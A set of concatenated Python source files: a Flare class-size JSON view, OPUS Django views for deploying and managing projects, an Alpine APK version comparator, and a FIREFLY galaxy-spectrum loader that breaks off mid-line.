"TooltipControl", "size": 8435} ] }, { "name": "data", "children": [ {"name": "Data", "size": 20544}, {"name": "DataList", "size": 19788}, {"name": "DataSprite", "size": 10349}, {"name": "EdgeSprite", "size": 3301}, {"name": "NodeSprite", "size": 19382}, { "name": "render", "children": [ {"name": "ArrowType", "size": 698}, {"name": "EdgeRenderer", "size": 5569}, {"name": "IRenderer", "size": 353}, {"name": "ShapeRenderer", "size": 2247} ] }, {"name": "ScaleBinding", "size": 11275}, {"name": "Tree", "size": 7147}, {"name": "TreeBuilder", "size": 9930} ] }, { "name": "events", "children": [ {"name": "DataEvent", "size": 2313}, {"name": "SelectionEvent", "size": 1880}, {"name": "TooltipEvent", "size": 1701}, {"name": "VisualizationEvent", "size": 1117} ] }, { "name": "legend", "children": [ {"name": "Legend", "size": 20859}, {"name": "LegendItem", "size": 4614}, {"name": "LegendRange", "size": 10530} ] }, { "name": "operator", "children": [ { "name": "distortion", "children": [ {"name": "BifocalDistortion", "size": 4461}, {"name": "Distortion", "size": 6314}, {"name": "FisheyeDistortion", "size": 3444} ] }, { "name": "encoder", "children": [ {"name": "ColorEncoder", "size": 3179}, {"name": "Encoder", "size": 4060}, {"name": "PropertyEncoder", "size": 4138}, {"name": "ShapeEncoder", "size": 1690}, {"name": "SizeEncoder", "size": 1830} ] }, { "name": "filter", "children": [ {"name": "FisheyeTreeFilter", "size": 5219}, {"name": "GraphDistanceFilter", "size": 3165}, {"name": "VisibilityFilter", "size": 3509} ] }, {"name": "IOperator", "size": 1286}, { "name": "label", "children": [ {"name": "Labeler", "size": 9956}, {"name": "RadialLabeler", "size": 3899}, {"name": "StackedAreaLabeler", "size": 3202} ] }, { "name": "layout", "children": [ {"name": "AxisLayout", "size": 6725}, {"name": "BundledEdgeRouter", "size": 3727}, {"name": "CircleLayout", "size": 9317}, {"name": "CirclePackingLayout", "size": 12003}, {"name": "DendrogramLayout", "size": 4853}, {"name": "ForceDirectedLayout", "size": 8411}, {"name": "IcicleTreeLayout", "size": 4864}, {"name": "IndentedTreeLayout", "size": 3174}, {"name": "Layout", "size": 7881}, {"name": "NodeLinkTreeLayout", "size": 12870}, {"name": "PieLayout", "size": 2728}, {"name": "RadialTreeLayout", "size": 12348}, {"name": "RandomLayout", "size": 870}, {"name": "StackedAreaLayout", "size": 9121}, {"name": "TreeMapLayout", "size": 9191} ] }, {"name": "Operator", "size": 2490}, {"name": "OperatorList", "size": 5248}, {"name": "OperatorSequence", "size": 4190}, {"name": "OperatorSwitch", "size": 2581}, {"name": "SortOperator", "size": 2023} ] }, {"name": "Visualization", "size": 16540} ] } ] } def init (request): return render_json(request, json.dumps(data, encoding="utf-8"))
############################################################################## # Copyright 2010 North Carolina State University # # # # Licensed under the Apache License, Version 2.0 (the "License"); # # you may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # ############################################################################## import functools import json import urllib2 import os.path from opus.project.deployment import models, forms import opus.lib.builder import opus.lib.deployer from opus.lib.deployer import DeploymentException import opus.lib.log from opus.project.deployment import tasks import opus.project.deployment.database log = opus.lib.log.get_logger() from django.conf import settings from django.shortcuts import render_to_response, get_object_or_404, redirect from django.template import RequestContext from django.contrib.auth.decorators import login_required from django.core.exceptions import ValidationError def render(templatename, params, request, code=200): response = render_to_response(templatename, params, context_instance=RequestContext(request)) response.status_code = code response['Content-Type'] = "text/html" return response # A few decorators that come in handy. Perhaps move these to another file for # organization def catch_deployerrors(f): """A decorator that catches ValidationError and DeploymentExceptions on views and renders error.html instead of letting the error propagate. I think this is unnecessary. Django has error handling built in, we should be using that outside of debug, and its built in error pages when debugging. """ @functools.wraps(f) def newf(request, *args, **kwargs): try: return f(request, *args, **kwargs) except (ValidationError, DeploymentException), e: log.warning("Caught an error while running view %s, rendering error.html. %s", f.__name__, e) return render("error.html", {'message': e}, request) return newf def get_project_object(f): """A decorator that wraps views which takes a parameter called projectname. Attempts to fetch the object from the database and calls the view function with the object as the second parameter. Raises 404 if not found. Also checks access permission. """ @functools.wraps(f) def newf(request, projectname, *args, **kwargs): obj = get_object_or_404(models.DeployedProject, name=projectname) if not obj.owner == request.user and not request.user.is_superuser: return render("error.html", {"message":"Access Denied"}, request) return f(request, obj, *args, **kwargs) return newf def debug_view(f): """Put this decorator on a view to dump to the log the request, post data, headers, and dump the returned data """ @functools.wraps(f) def newf(request, *args, **kwargs): import pprint log.debug("{0} view called".format(f.__name__)) log.debug("Method was {0}".format(request.method)) log.debug(request.raw_post_data) log.debug(request.POST) log.debug(pprint.pformat(request.META)) ret = f(request, *args, **kwargs) log.debug(str(ret)) return ret return newf # The actual views # ################ @login_required def list_or_new(request): """This view should render a page that displays currently deployed projects available to edit, and a form to create+deploy a new project. """ message = "" if 'name' in request.GET: if not models.id_re.match(request.GET['name']): message = "Bad project name. Project names must consist of only letters, numbers, and the underscore character. They must not begin with a number. And they must be less than 25 characters long." else: return redirect("opus.project.deployment.views.edit_or_create", projectname=request.GET['name']) # Get existing projects and list them deployments = models.DeployedProject.objects.all() if not request.user.is_superuser: deployments = deployments.filter(owner=request.user) return render("deployment/list_deployments.html", { 'deployments': deployments, 'message': message, 'suffix': settings.OPUS_APACHE_SERVERNAME_SUFFIX, }, request) @login_required def edit_or_create(request, projectname): """This view does four things: When called with a GET method and a projectname that doesn't exist, displays the necessary forms for creating and deploying a new project When called with a POST method and a projectname that doesn't exist, uses the POST data to create and deploy a new project When called with a GET method and a projectname that does exist, displays a form to edit attributes of a depolyed project. When called with a POST method and a projectname that does exist, uses the POST data to edit the project attributes. """ # Check the max length of the project name to provide a better error # message. Let me know if anyone knows an easier way to extract the # max_length attribute of the 'name' field of a database model object. max_length = models.DeployedProject._meta.get_field_by_name('name')[0].max_length if len(projectname) > max_length: return render("error.html", { "message": "Project names must be less than {0} characters"\ .format(max_length), }, request) # Try and fetch the database object to see if the project exists projectquery = models.DeployedProject.objects.filter( name=projectname) if projectquery.exists(): # Project does exist, we're in edit mode return edit(request, projectname) else: # Project does not exist, we're in create mode return create(request, projectname) def _get_initial_edit_data(project): # Get the initial values for this form, so we can tell what changed when # the user submits it database = project.config['DATABASES']['default'] initial = {} initial['dbname'] = database['NAME'] initial['dbengine'] = database['ENGINE'].rsplit(".",1)[1] initial['dbpassword'] = "12345" # Nobody would use this password initial['dbhost'] = database['HOST'] initial['dbport'] = database['PORT'] initial['active'] = project.active initial['debug'] = project.config['DEBUG'] return initial @login_required @get_project_object def edit(request, project): """Configuration editor view for an already deployed project """ initial = _get_initial_edit_data(project) if request.method == "POST": form = forms.DeploymentForm(request.POST, initial=initial) if form.is_valid(): log.info("Edit form submitted and is valid. Editing project parameters") cd = form.cleaned_data # Go and modify the project/config parameters. Don't save yet for field in form.changed_data: if field == "dbengine": database['ENGINE'] = 'django.db.backends.' + cd['dbengine'] log.debug("dbengine changed to %s", cd['dbengine']) elif field == "dbpassword": database['PASSWORD'] = cd['dbpassword'] log.debug("dbpassword changed",) elif field == "dbhost": database['HOST'] = cd['dbhost'] log.debug("dbhost changed to %s", cd['dbhost']) elif field == "dbport": database['PORT'] = cd['dbport'] log.debug("dbport changed to %s", cd['dbport']) project.set_debug(cd['debug']) messages = [] # Validate the modified model try: # This may error if there's a port conflict or something project.full_clean() except ValidationError, e: log.info("Project model didn't clean. %s", e) messages.extend(e.messages) # Re-load the project object with the old data, for the "Info" # section project = models.DeployedProject.objects.get(pk=project.pk) else: log.info("Model cleaned, saving") # save model and config, activate/deactivate if requested, # add new superuser if requested project.save() if "superusername" in form.changed_data: # Should this code be offloaded to a method in the model? log.debug("Adding new superuser") deployer = opus.lib.deployer.ProjectDeployer(project.projectdir) try: deployer.create_superuser(cd['superusername'], cd['superemail'], cd['superpassword'], ) except DeploymentException, e: if "column username is not unique" in e.message: messages.append("User with that name already exists!") else: raise e else: messages.append("New superuser created") # Don't re-render the username and password in the form # First make it mutable form.data = form.data.copy() # Then delete these properties del form.data['superusername'] del form.data['superemail'] del form.data['superpassword'] del form.data['superpasswordconfirm'] # Do this after everything else. If activate fails due to # missing app settings, it redirects. Everything else should # still be saved though. if 'active' in form.changed_data: if cd['active']: if not project.all_settings_set(): log.debug("Tried to activate, but still needs settings set. Rendering app settings page") appforms = _get_app_settings_forms(project.get_app_settings(), project.config) if messages: messages.append("") messages.append("BUT...") messages.append("You asked me to activate the project, but you must set all the settings below first.") return render("deployment/appsettings.html", dict( appforms=appforms, project=project, messages=messages, ), request) log.debug("Activating") project.activate() messages.append("Project activated") else: log.debug("Deactivating") project.deactivate() messages.append("Project deactivated") return render("deployment/edit.html", {'project': project, 'form': form, 'message': "<br />".join(messages), 'applist': _get_apps(project), 'appform': forms.AppForm(), }, request) else: form = forms.DeploymentForm(initial=initial) newappform = forms.AppForm() return render("deployment/edit.html", {'project': project, 'form': form, 'appform': newappform, 'applist': _get_apps(project), }, request) @login_required def create(request, projectname): """Create and deploy a new project. Displays the form to do so on GET, goes and does a create + deploy operation on POST. Also has the feature to pre-fill out the form from an incomming JSON token. """ if request.method == "POST" and request.META['CONTENT_TYPE'] == \ "application/x-www-form-urlencoded": # If the submitted type is not form encoded data, it's probably a json # spec of applications, which should instead go to populate and display # the forms. pform = forms.ProjectForm(request.POST) appsform = forms.AppFormSet(request.POST) dform = forms.DeploymentForm(request.POST, noactive=True) allforms = [pform, appsform, dform] # If forms aren't valid, fall through and display the (invalid) forms # with error text if all(f.is_valid() for f in allforms): log.info("Preparing to create+deploy %s", projectname) pdata = pform.cleaned_data # Create the deployment object to do some early validation checks deployment = models.DeployedProject() deployment.name = projectname deployment.owner = request.user deployment.full_clean() # Configure the new project. None of these actions actually execute # until we enter the try block below builder = opus.lib.builder.ProjectBuilder(projectname) for appdata in appsform.cleaned_data: if not appdata: # Left blank, nothing to add continue log.debug(" ... with app %r", appdata['apppath']) builder.add_app(appdata['appname'], appdata['apppath'], appdata['apptype']) if pdata['idprovider'] != 'local': log.debug(" ... and the idp app %r", pdata['idprovider']) appname, apptype, apppath = \ settings.OPUS_ALLOWED_AUTH_APPS[pdata['idprovider']] builder.add_app(appname, apppath, apptype) # Now actually execute the tasks. This is done in a try block which # catches all exceptions so that we can roll back failed partial # deployments in any error cases. log.debug("Executing create action on %r...", projectname) try: # Create the project directory projectdir = builder.create(settings.OPUS_BASE_DIR) log.info("%r created, starting deploy process", projectname) # Prepare deployment parameters info = models.DeploymentInfo() info.dbengine = dform.cleaned_data['dbengine'] # If requested, create a database for it if info.dbengine == "postgresql_psycopg2" and \ settings.OPUS_AUTO_POSTGRES_CONFIG: autodb = opus.project.deployment.database.\ setup_postgres(projectname) info.dbname, info.dbuser, info.dbpassword, \ info.dbhost, info.dbport = autodb elif info.dbengine == "sqlite3": # SQLite database locations get set automatically by the # deployment libraries. No other options are set. # SQLite is handled differently (as far as the location of # the code) since the file must be secured properly. So # the deployer handles that correctly along side its # routines to change permissions on the directory. pass else: info.dbname = dform.cleaned_data['dbname'] info.dbuser = dform.cleaned_data['dbuser'] info.dbpassword = dform.cleaned_data['dbpassword'] info.dbhost = dform.cleaned_data['dbhost'] info.dbport = dform.cleaned_data['dbport'] info.superusername = dform.cleaned_data['superusername'] info.superemail = dform.cleaned_data['superemail'] info.superpassword = dform.cleaned_data['superpassword'] # Deploy it now! But don't activate it. deployment.deploy(info, False) deployment.set_debug(dform.cleaned_data['debug']) deployment.save() except Exception, e: # The project didn't deploy for whatever reason. Delete the # project directory and re-raise the exception # Careful that this method isn't called on an existing project, # since it could be tricked into deleting an existing project. # edit_or_create() ought to check that for us, this function # shouldn't be called on an existing project. log.error("Project didn't fully create or deploy, rolling back deployment. %s", e) # Schedule a task to delete the project tasks.destroy_project_by_name.delay(deployment.name) raise log.info("Project %r successfully deployed", projectname) return redirect("opus.project.deployment.views.set_app_settings", projectname) else: log.debug(request.POST) log.debug("Create view called, but forms didn't validate") else: # Request was either a GET, or was a POST with non-form data # Display blank forms log.debug("create view called, displaying form") appsform = forms.AppFormSet() pform = forms.ProjectForm() dform = forms.DeploymentForm(noactive=True) # If a token was passed in to the GET params, try and use it to # populate the app list formset token = request.GET.get("token", False) if token: metadata = urllib2.urlopen(opus.COMMUNITY_URL + "/metadata/" + token) metaobj = json.load(metadata) # Fill the app form set with this initial data appsform = forms.AppFormSet(initial=metaobj['applist']) pform = forms.ProjectForm() return render("deployment/newform.html", dict( pform=pform, appsform=appsform, dform=dform, projectname=projectname, ), request) def _get_app_settings_forms(app_settings, initial=None, data=None): """Returns a dict mapping app names to UserSettingForm objects given a dictionary as returned by DeployedProject.get_app_settings() """ appforms = {} for appname, s in app_settings.iteritems(): appforms[appname] = forms.UserSettingsForm(s, data, prefix=appname, initial=initial) return appforms @login_required @get_project_object def set_app_settings(request, project): """Asks the user about application specific settings. This includes any chosen projects, as well as hardcoded ldap or openid features""" if request.method == "POST": appforms = _get_app_settings_forms(project.get_app_settings(), project.config, request.POST) if all(x.is_valid() for x in appforms.itervalues()): # Save the settings for app, appform in appforms.iteritems(): opus.lib.builder.merge_settings( project.config, appform.cleaned_data) project.config.save() # Either way, the config needs to be reloaded, either by calling # activate() wich writes the config file, or by calling save() # which touches the wsgi config if "activate" in request.POST: # Writes apache config and restarts apache project.activate() message = "Settings saved, and project activated" elif "active" in request.POST: # GWT submits this hidden field to activate or deactivate if request.POST['active'] == 'false': project.deactivate() else: project.activate() else: # Saves model, writes config file, touches wsgi config project.save() message = "Settings saved" return render("deployment/appsettings.html", dict( appforms=appforms, project=project, message=message, ), request) else: appforms = _get_app_settings_forms(project.get_app_settings(), project.config) return render("deployment/appsettings.html", dict( appforms=appforms, project=project, ), request) @login_required @get_project_object def destroy(request, project): """Destroys a project""" if request.method == "POST": tasks.destroy_project.delay(project.pk) return render("deployment/destroyed.html", { 'projectname': project.name }, request) else: return redirect(project) @login_required @get_project_object def addapp(request, project): """Adds an application on submission of an app form""" if request.method == "POST": appform = forms.AppForm(request.POST) if appform.is_valid(): # Go and add an app editor = opus.lib.builder.ProjectEditor(project.projectdir) editor.add_app(appform.cleaned_data['appname'], appform.cleaned_data['apppath'], appform.cleaned_data['apptype'], secureops=settings.OPUS_SECUREOPS_COMMAND) editor.restart_celery(settings.OPUS_SECUREOPS_COMMAND) return render("deployment/addappform.html", dict( message='Application added', appform=forms.AppForm(), project=project, ), request) else: appform = forms.AppForm() return render("deployment/addappform.html", dict( appform=appform, project=project, ), request) def _get_apps(project): apps = [] for potential in project.config['INSTALLED_APPS']: if "." in potential: continue if os.path.exists(os.path.join(project.projectdir,potential)): apps.append(dict(appname=potential)) return apps @login_required @get_project_object def editapp(request, project): if request.method == "POST": form = forms.EditAppFormSet(request.POST, initial=_get_apps(project)) if form.is_valid(): editor = opus.lib.builder.ProjectEditor(project.projectdir) deletecount = 0 upgradecount = 0 failures = [] for appform in form.forms: if appform in form.deleted_forms: # So that cleaned_data gets populated appform.full_clean() try: editor.del_app(appform.cleaned_data['appname']) except opus.lib.builder.BuildException, e: failures.append((appform.cleaned_data['appname'], 'delete', e)) else: deletecount += 1 # Remove the app from the installed app in the config. # This is also done by the call to del_app(), but since # the config has been loaded into memory already by the # model object, that data becomes stale. This line is # mostly just a hack so the next call to _get_apps() # returns correct data. This change isn't saved, since # there's no reason to. The change was already saved by # del_app() project.config['INSTALLED_APPS'].remove( appform.cleaned_data['appname']) elif appform.cleaned_data['upgradever']: try: editor.upgrade_app(appform.cleaned_data['appname'], appform.cleaned_data['upgradever']) except opus.lib.builder.BuildException, e: failures.append((appform.cleaned_data['appname'], 'upgrade', e)) else: upgradecount += 1 if upgradecount > 0 or deletecount > 0: editor.restart_celery(settings.OPUS_SECUREOPS_COMMAND) message = "{upcnt} {upproj} upgraded successfully. {delcnt} {delproj} deleted successfully.".format( upcnt = upgradecount, upproj = "projects" if upgradecount != 1 else "project", delcnt = deletecount, delproj = "projects" if deletecount != 1 else "project", ) # Render a new formset, to get the upgraded info and to not render # any recently deleted projects form = forms.EditAppFormSet(initial=_get_apps(project)) return render("deployment/appedit.html", dict( form=form, project=project, message=message, failures=failures, ), request) else: form = forms.EditAppFormSet(initial=_get_apps(project)) return render("deployment/appedit.html", dict( form=form, project=project, ), request) def gwt(request): """GWT view. Login is not required, the GWT interface handles that itself. """ if 'token' in request.GET: token = request.GET['token'] else: token = None if request.is_secure(): deployerurl = "https://" + request.get_host() else: deployerurl = "http://" + request.get_host() return render("OPUSManagementConsoleGWT.html", dict(mediaprefix = settings.OPUS_GWT_MEDIA, baseurl = settings.OPUS_APACHE_SERVERNAME_SUFFIX, repourl = opus.REPO_URL, communityurl = opus.COMMUNITY_URL, deployerurl = deployerurl, project_token = token ), request)
""" Utilities for working with APK packages in Alpine images """ import enum import copy class ComparisonResult(enum.IntEnum): less_than = -1 equal_to = 0 greater_than = 1 class TokenType(enum.IntEnum): INVALID = -1, DIGIT_OR_ZERO = 0, DIGIT = 1, LETTER = 2, SUFFIX = 3, SUFFIX_NO = 4, REVISION_NO = 5, END = 6 # Ordering of these lists is important for evaluation correctness. Positions in the list are used for relative comparison pre_release_suffixes = ['alpha', 'beta', 'pre', 'rc'] post_release_suffixes = ['cvs', 'svn', 'git', 'hg', 'p'] def next_token(expected_type, data): """ Based on the expected next type, consume the next token returning the type found and an updated buffer with the found token removed :param expected_type: :param data: :return: (TokenType, str) tuple where TokenType is the type of the next token expected """ next_data = copy.copy(data) next_type = TokenType.INVALID if len(next_data) == 0 or next_data[0] == None: next_type = TokenType.END elif (expected_type == TokenType.DIGIT or expected_type == TokenType.DIGIT_OR_ZERO) and next_data[0].isalpha(): next_type = TokenType.LETTER elif expected_type == TokenType.LETTER and next_data[0].isdigit(): next_type = TokenType.DIGIT elif expected_type == TokenType.SUFFIX and next_data[0].isdigit(): next_type = TokenType.SUFFIX_NO else: if next_data[0] == '.': next_type = TokenType.DIGIT_OR_ZERO elif next_data[0] == '_': next_type = TokenType.SUFFIX elif next_data[0] == '-': if len(next_data) > 1 and next_data[1] == 'r': next_type = TokenType.REVISION_NO # Pop leading char off next_data = next_data[1:] else: next_type = TokenType.INVALID next_data = next_data[1:] if next_type < expected_type: if not ((next_type == TokenType.DIGIT_OR_ZERO and expected_type == TokenType.DIGIT) or (next_type == TokenType.SUFFIX and expected_type == TokenType.SUFFIX_NO) or (next_type == TokenType.DIGIT and expected_type == TokenType.LETTER)): next_type = TokenType.INVALID return next_type, next_data def get_token(expected_type, data): """ Given the expected token type and the data, grab the next token and return a tuple of (token, token_type, updated_string) :param expected_type: Parts enum value for tthe expected type :param data: the str from which to pull next token starting at the beginning :return: (token, token_type, new working str) """ token_value = i = 0 next_token_type = TokenType.INVALID d_len = len(data) if len(data) <= 0: return 0, TokenType.END, data if expected_type == TokenType.DIGIT_OR_ZERO and data[i] == '0': # Handled leading zeros while i < d_len and data[i] == '0': i += 1 next_token_type = TokenType.DIGIT token_value = -i elif expected_type in [TokenType.DIGIT_OR_ZERO, TokenType.DIGIT, TokenType.SUFFIX_NO, TokenType.REVISION_NO]: # Handle numbers dig_val = '' while i < d_len and data[i].isdigit(): dig_val += data[i] i += 1 token_value = int(dig_val) if dig_val else 0 elif expected_type == TokenType.LETTER: # Handle letter values token_value = ord(data[i]) i += 1 elif expected_type == TokenType.SUFFIX: idx = -1 # Is this is a pre-release suffix? for s in pre_release_suffixes: i = len(s) if data.startswith(s): idx = pre_release_suffixes.index(s) break if idx >= 0: token_value = idx - len(pre_release_suffixes) else: idx = -1 # Try post-release suffixes for a match for s in post_release_suffixes: i = len(s) if data.startswith(s): idx = post_release_suffixes.index(s) break if idx < 0: # No match found return -1, TokenType.INVALID, data else: token_value = idx else: return -1, TokenType.INVALID, data data = data[i:] if len(data) == 0: next_token_type = TokenType.END elif next_token_type != TokenType.INVALID: pass else: next_token_type, data = next_token(expected_type, data) return token_value, next_token_type, data def get_version_relationship(ver_str1, ver_str2): """ Comparison of alpine package version numbers. Roughly based on the C code from github.com/apk-tools/version.c but in pure python. :param ver_str1: :param ver_str2: :return: """ # Expect first type to be a digit, per Gentoo spec (used by apk) v1_type = TokenType.DIGIT v2_type = TokenType.DIGIT v1_tok = 0 v2_tok = 0 if ver_str1 is None and ver_str2 is None: return ComparisonResult.equal_to if ver_str1 is None and ver_str2 is not None: return ComparisonResult.less_than if ver_str1 is not None and ver_str2 is None: return ComparisonResult.greater_than # Find either the end of one string or the first invalid token of first non-equal token pair. while v1_type == v2_type and v1_type != TokenType.END and v1_type != TokenType.INVALID and v1_tok == v2_tok: v1_tok, v1_type, ver_str1 = get_token(v1_type, ver_str1) v2_tok, v2_type, ver_str2 = get_token(v2_type, ver_str2) # Check the value of the current token if v1_tok < v2_tok: return ComparisonResult.less_than if v1_tok > v2_tok: return ComparisonResult.greater_than if v1_type == v2_type: return ComparisonResult.equal_to if v1_type == TokenType.SUFFIX and get_token(v1_type, ver_str1)[0] < 0: return ComparisonResult.less_than if v2_type == TokenType.SUFFIX and get_token(v2_type, ver_str2)[0] < 0: return ComparisonResult.greater_than if v1_type > v2_type: return ComparisonResult.less_than if v2_type > v1_type: return ComparisonResult.greater_than return ComparisonResult.equal_to def compare_versions(v1, op, v2): result = get_version_relationship(v1, v2) if op == 'eq': return result == ComparisonResult.equal_to if op == 'lt': return result == ComparisonResult.less_than if op == 'gt': return result == ComparisonResult.greater_than else: raise ValueError('Unsupported op type', op)
""" .. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com> *General purpose*: The class GalaxySpectrumFIREFLY is dedicated to handling spectra to be fed to FIREFLY for fitting its stellar population *Imports*:: import numpy as np import astropy.io.fits as pyfits import glob from firefly_dust import get_dust_radec """ import numpy as np import astropy.io.fits as pyfits import glob import os from firefly_dust import get_dust_radec import astropy.cosmology as cc cosmo = cc.Planck13 import astropy.units as uu class GalaxySpectrumFIREFLY: """ Loads the environnement to transform observed spectra into the input for FIREFLY. Currently SDSS spectra, speclite format is handled as well as stacks from the VVDS and the DEEP2 galaxy surveys. :param path_to_spectrum: path to the spectrum :param milky_way_reddening: True if you want to correct from the Milky way redenning using the Schlegel 98 dust maps. :param hpf_mode: models the dust attenuation observed in the spectrum using high pass filter. :param survey: name of the survey :param N_angstrom_masked: number ofangstrom masked around emission lines to look only at the continuum spectrum In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ def __init__(self,path_to_spectrum, milky_way_reddening=True , hpf_mode = 'on', N_angstrom_masked = 20.): self.path_to_spectrum=path_to_spectrum self.milky_way_reddening = milky_way_reddening self.hpf_mode = hpf_mode self.N_angstrom_masked = N_angstrom_masked def openGAMAsimulatedSpectrum(self, error_multiplicative_factor = 1.): """ Opens the smulated data set filename = os.path.join(os.environ['DATA_DIR'], "spm", "GAMAmock/gal_0000_GAMA_M10_z0.15.dat") """ data = np.loadtxt(self.path_to_spectrum, unpack=True, skiprows=1) f=open(self.path_to_spectrum, 'r') self.redshift = float(f.readline()) f.close() DL = cosmo.luminosity_distance(self.redshift).to(uu.cm) m_w_2_erg_p_s = uu.W.to(uu.erg/uu.s) * 10.**(17.) self.ra=0. self.dec=0. self.wavelength = data[0] * (1+ self.redshift) self.flux = data[1] * m_w_2_erg_p_s / DL.value**2 self.error = data[2] * m_w_2_erg_p_s / DL.value**2 * error_multiplicative_factor self.bad_flags = np.ones(len(self.wavelength)) self.vdisp = 70. self.restframe_wavelength = data[0] self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 self.ebv_mw = 0.0 def openObservedSDSSSpectrum(self, survey='sdssMain'): """ It reads an SDSS spectrum and provides the input for the firefly fitting routine. In this aims, it stores the following data in the object : * hdu list from the spec lite * SED data : wavelength (in angstrom), flux, error on the flux (in 10^{-17} erg/cm2/s/Angstrom, like the SDSS spectra) * Metadata : * ra : in degrees J2000 * dec : in degrees J2000 * redshift : best fit * vdisp : velocity dispersion in km/s * r_instrument : resolution of the instrument at each wavelength observed * trust_flag : 1 or True if trusted * bad_flags : ones as long as the wavelength array, filters the pixels with bad data * objid : object id optional : set to 0 """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = self.hdulist[0].header['RA'] self.dec = self.hdulist[0].header['DEC'] self.wavelength = 10**self.hdulist[1].data['loglam'] self.flux = self.hdulist[1].data['flux'] self.error = self.hdulist[1].data['ivar']**(-0.5) self.bad_flags = np.ones(len(self.wavelength)) if survey=='sdssMain': self.redshift = self.hdulist[2].data['Z'][0] if survey=='sdss3': self.redshift = self.hdulist[2].data['Z_NOQSO'][0] if survey=='sdss4': self.redshift = self.hdulist[2].data['Z_NOQSO'][0] self.vdisp = self.hdulist[2].data['VDISP'][0] self.restframe_wavelength = self.wavelength / (1.0+self.redshift) self.trust_flag = 1 self.objid = 0 # masking emission lines lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = self.wavelength[(lines_mask==False)] self.flux = self.flux[(lines_mask==False)] self.error = self.error[(lines_mask==False)] self.bad_flags = self.bad_flags[(lines_mask==False)] bad_data = np.isnan(self.flux) | np.isinf(self.flux) | (self.flux <= 0.0) | np.isnan(self.error) | np.isinf(self.error) # removes the bad data from the spectrum self.flux[bad_data] = 0.0 self.error[bad_data] = np.max(self.flux) * 99999999999.9 self.bad_flags[bad_data] = 0 self.r_instrument = np.zeros(len(self.wavelength)) for wi,w in enumerate(self.wavelength): if w<6000: self.r_instrument[wi] = (2270.0-1560.0)/(6000.0-3700.0)*w + 420.0 else: self.r_instrument[wi] = (2650.0-1850.0)/(9000.0-6000.0)*w + 250.0 if self.milky_way_reddening : # gets the amount of MW reddening on the models self.ebv_mw = get_dust_radec(self.ra,self.dec,'ebv') else: self.ebv_mw = 0.0 def openObservedStack(self, fluxKeyword='medianWeightedStack'): """ It reads an Stack spectrum from the LF analysis and provides the input for the firefly fitting routine. :param fluxKeyword: parameter to choose the mean or the median stack 'meanWeightedStack', 'medianWeightedStack' """ self.hdulist = pyfits.open(self.path_to_spectrum) self.ra = 0. #self.hdulist[0].header['RA'] self.dec = 0. #self.hdulist[0].header['DEC'] self.redshift = float(os.path.basename(self.path_to_spectrum).split('-')[-1].split('_')[0][1:]) self.restframe_wavelength = self.hdulist[1].data['wavelength'] self.wavelength = self.restframe_wavelength * (1. + self.redshift) meanWL = (self.wavelength[1:]+self.wavelength[:-1])/2. deltaWL = self.wavelength[1:]-self.wavelength[:-1] resolution = np.ones_like(self.wavelength)*np.mean(meanWL / deltaWL) #self.flux = self.hdulist[1].data['meanWeightedStack'] * 1e17 self.flux = self.hdulist[1].data[fluxKeyword] * 1e17 self.error = self.hdulist[1].data['jackknifStackErrors'] * 1e17 self.bad_flags = np.ones(len(self.restframe_wavelength)) Nstacked = float(self.path_to_spectrum.split('-')[-1].split('_')[3]) lines_mask = ((self.restframe_wavelength > 3728 - self.N_angstrom_masked) & (self.restframe_wavelength < 3728 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 5007 - self.N_angstrom_masked) & (self.restframe_wavelength < 5007 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 4861 - self.N_angstrom_masked) & (self.restframe_wavelength < 4861 + self.N_angstrom_masked)) | ((self.restframe_wavelength > 6564 - self.N_angstrom_masked) & (self.restframe_wavelength < 6564 + self.N_angstrom_masked)) | ( self.hdulist[1].data['NspectraPerPixel'] < Nstacked * 0.8 ) | (self.flux==-9999.99) self.restframe_wavelength = self.restframe_wavelength[(lines_mask==False)] self.wavelength = 